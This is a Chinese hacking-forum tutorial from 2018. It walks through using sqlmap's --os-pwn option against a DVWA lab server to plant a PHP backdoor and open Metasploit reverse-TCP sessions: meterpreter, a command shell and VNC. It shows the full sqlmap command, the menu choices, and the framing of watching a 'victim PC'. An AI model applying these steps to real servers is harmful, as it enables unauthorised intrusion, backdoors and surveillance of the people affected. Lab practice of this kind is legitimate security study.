渗透工具实战:利用Sqlmap和Metaasp来渗透测试网站服务器(OS-Pwn)

zevseo
10700zevseo大版主
2018-09-12 02:48:59
10700 2018-09-12 02:48:59
这个文章是关于如何使用sqlmap进行sql注入来破解受害者pc并获得shell访问权限。在这里我执行了sql攻击以获得三种不同类型的shell(meterpreter;命令shell; VNC)


需求:

Xampp / Wamp服务器                                                                                                          
DVWA实验室
Kali Linux:Burpsuite,sqlmap工具
首先,您需要在XAMPP或WAMP服务器中安装DVWA实验室,请阅读此处的完整文章
现在打开电脑中的DVWA并使用以下凭据登录:
用户名  - admin
密码  - 密码
单击  DVWA Security  并将网站安全级别设置为  
从漏洞列表中选择SQL Injection以进行攻击。 在文本框中键入  用户ID:1。不设置浏览器代理,请不要单击提交按钮。设置浏览器代理以使burp套件正常工作。
利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器


打开burp套件点击菜单栏中的代理 ,  然后  按下按钮。回来并点击   dvwa中的提交按钮。Burp将在获取的数据下提供“cookie”和“referrer”,稍后将在sqlmap命令中使用。
利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器


让我们使用sqlmap命令下的“referrer和cookies”枚举所有数据库名称。
sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn

利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器


它已经转储了所有数据库的名称。现在我将选择dvwa来访问其后端数据库管理系统。
利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器


现在输入以下命令来访问Web服务器的shell并按照屏幕截图显示。

sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn

利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器


类型1Metasploit的框架建立然后反向连接键入4  为  PHP的  有效载荷支持服务器和再次  键入1为  共同的位置对于可写目录  上传有效载荷(payload )作为受害者PC后门。
利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器


这里类型1用于reverse tcp连接作为默认选项。现在我将逐个选择这三个有效负载并尝试每次都破解Web服务器。现在输入1作为meterpreter。

它将加载metasploit框架并提供meterpreter会话1。

重复整个过程,直到反向tcp连接进一步要求选择有效负载,然后输入2作为shell。

它将再次加载metasploit框架并提供命令shell会话1。

重复整个过程直到反向tcp连接(everse tcp connection),当它进一步要求选择有效载荷时,这次现在为VNC 键入3

它将再次加载metasploit框架和launchVNC查看器。

在这里,您可以从给定的屏幕截图中看到我通过tightVNC访问受害者pc,现在受害者每一刻都将被保留在我的观察之下。因此我们用各种类型的shell攻击受害者pc三次。
利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器


本文标题:渗透工具实战:利用Sqlmap和Metaasp来渗透测试网站服务器(OS-Pwn)
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2335.html
图片
利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器

利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器

利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器

利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器

利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器

利用Sqlmap和Metaasp来渗透测试网站服务器

描述:利用Sqlmap和Metaasp来渗透测试网站服务器

游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan